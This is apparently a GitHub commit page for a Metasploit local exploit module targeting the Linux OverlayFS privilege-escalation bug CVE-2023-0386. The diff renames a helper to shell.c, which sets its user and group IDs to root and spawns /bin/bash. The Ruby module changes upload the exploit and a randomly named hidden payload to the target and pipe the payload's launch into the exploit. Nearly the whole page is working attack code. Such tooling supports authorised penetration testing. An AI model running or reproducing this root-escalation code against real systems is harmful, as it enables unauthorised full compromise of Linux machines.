Skip to content

Commit 8366252

Browse files
Takahiro-YokoTakahiro-Yoko
committed
Not call payload directory
1 parent 692531b commit 8366252

File tree

3 files changed

+10
-13
lines changed

3 files changed

+10
-13
lines changed

data/exploits/CVE-2023-0386/payload_wrapper.x64.elf renamed to data/exploits/CVE-2023-0386/shell.x64.elf

16.5 KB
Binary file not shown.

external/source/exploits/CVE-2023-0386/payload_wrapper.c renamed to external/source/exploits/CVE-2023-0386/shell.c

Lines changed: 5 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,15 +1,10 @@
11
#define _GNU_SOURCE
22
#include <stdio.h>
33
#include <stdlib.h>
4-
#include <string.h>
54
#include <unistd.h>
65

6+
77
int main(int argc, char const *argv[]) {
8-
char cwd[500];
9-
if (getcwd(cwd, sizeof(cwd)) == NULL) {
10-
perror("getcwd() error");
11-
return 1;
12-
}
138
if (setuid(0) < 0) {
149
perror("setuid");
1510
return -1;
@@ -19,6 +14,8 @@ int main(int argc, char const *argv[]) {
1914
perror("setgid");
2015
return -1;
2116
}
22-
system(strcat(cwd, "/payload"));
17+
18+
system("/bin/bash");
19+
2320
return 0;
24-
}
21+
}

modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -112,28 +112,28 @@ def exploit
112112
# Upload exploit executable
113113
exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
114114
exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
115-
payload_wrapper_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
115+
shell_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
116116

117117
mkdir(exploit_dir)
118118
register_dir_for_cleanup(exploit_dir)
119119

120120
if live_compile?
121121
vprint_status('Live compiling exploit on system...')
122122
upload_and_compile(exploit_path, strip_comments(exploit_source('CVE-2023-0386', 'cve_2023_0386.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
123-
upload_and_compile(payload_wrapper_path, strip_comments(exploit_source('CVE-2023-0386', 'payload_wrapper.c')))
123+
upload_and_compile(shell_path, strip_comments(exploit_source('CVE-2023-0386', 'shell.c')))
124124
else
125125
vprint_status('Dropping pre-compiled exploit on system...')
126126
upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
127-
upload_and_chmodx(payload_wrapper_path, exploit_data('CVE-2023-0386', 'payload_wrapper.x64.elf'))
127+
upload_and_chmodx(shell_path, exploit_data('CVE-2023-0386', 'shell.x64.elf'))
128128
end
129129

130130
# Upload payload executable
131-
payload_path = "#{exploit_dir}/payload"
131+
payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
132132
upload_and_chmodx(payload_path, generate_payload_exe)
133133

134134
# Launch exploit
135135
print_status('Launching exploit...')
136-
cmd_string = "#{exploit_path} #{payload_wrapper_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
136+
cmd_string = "echo '#{payload_path} & exit' | #{exploit_path} #{shell_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
137137
vprint_status("Running: #{cmd_string}")
138138
begin
139139
output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])

0 commit comments

Comments
 (0)